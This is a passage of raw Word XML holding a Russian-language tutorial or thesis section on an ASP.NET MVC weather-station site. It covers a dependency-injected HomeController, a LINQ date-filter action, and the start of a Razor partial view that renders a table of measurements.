    </w:p>
    <w:p w14:paraId="77F2CF45" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00112081" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00112081">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00112081">
        <w:rPr>
          <w:color w:val="2B91AF"/>
        </w:rPr>
        <w:t>HomeController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>measRepo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39067F7B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49555D70" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>._</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>measurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>measRepo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE5DAA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="001F04F3" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C23A4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:r>
        <w:t xml:space="preserve">Затем в контроллере вся логика обработки данных модели будет совершаться только через объект </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>measurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Например</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> передача данных метеостанции за указанную пользователем дату через кнопку календаря в представление определяется следующим методом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C401F2B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00112081" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00112081">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>HttpGet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8B799" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00112081" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00112081">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>PartialViewResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>GetTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>DateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA82F8A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00112081" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00112081">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01349B80" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00112081" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112081">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> = _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>measurementRepository.Measurements.Where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve">(p =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>p.measure_date</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>date.ToUniversalTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3E3339" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PartialView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FF49E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73980758" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:r>
        <w:t xml:space="preserve">Можно увидеть, что посредством </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">запроса к объекту </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>measurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> будет возвращено представление с отфильтрованными по значению входного параметра метода данными. Атрибут </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>HttpGet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и входной параметр метода необходимы для взаимодействия с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файлами, которые отвечают за создание интерактивных графиков. Сами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файлы и механизм взаимодействия их с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сервером будут описаны ниже в главе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5EB2C8" w14:textId="34BF6E64" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:r>
        <w:t xml:space="preserve">Далее необходимо перейти к рассмотрению файла представления, который является последним звеном в цепочке программирования паттерна «внедрение зависимостей». Особенность программирования технологии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">заключается в том, что файл представления, в который передаются данные из контроллера должны называться точно также как и метод контроллера, который передаёт эти данные. Из кода выше можно сказать о файле представления следующее: он называется </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>GetTable.cshtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">расширение </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>cshtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">говорит само за себя: файл является смесью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">кода и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>-разметки</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6628">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>, и он является частичным представлением</w:t>
      </w:r>
      <w:r w:rsidR="008353F2">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:t xml:space="preserve">знак подчёркивания в префиксе названия свидетельствует о том, что это файл частичного представления, это является необязательным атрибутом в названии файла, но существует соглашения у разработчиков </w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:t xml:space="preserve"> об именовании файлов, это является одним из примеров таких соглашений</w:t>
      </w:r>
      <w:r w:rsidR="008353F2">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, поскольку метод контроллера возвращает объект </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>PartialView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Частичное представление – это тоже файл представления, но он отличается от обычного представления тем, что он встраивается в обычное представление, иными словами</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> частичное представление является частью родительского представления. Код файла </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>GetTable.cshtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD6738" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>IQueryable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>Measurement</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D8A89" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="001F04F3" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>@{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6896A3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Model.Count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>() &gt; 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67E880" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F1E96"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able</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04554127"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head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B134C8"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>date</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t_pov</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far</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rh</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t</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winddir</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wind</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>tr</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A42BEAB"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head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9949B6"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body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CADAFAC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                @</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>foreach</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> measure </w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E392A2E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2214189B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>DateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> date = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:t>DateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>measure.measure_date.Year</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>measure.measure_date.Month</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>measure.measure_date.Day</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>measure.measure_hour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>measure.measure_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, 0, 0);</w:t>
      </w:r>
    </w:p>
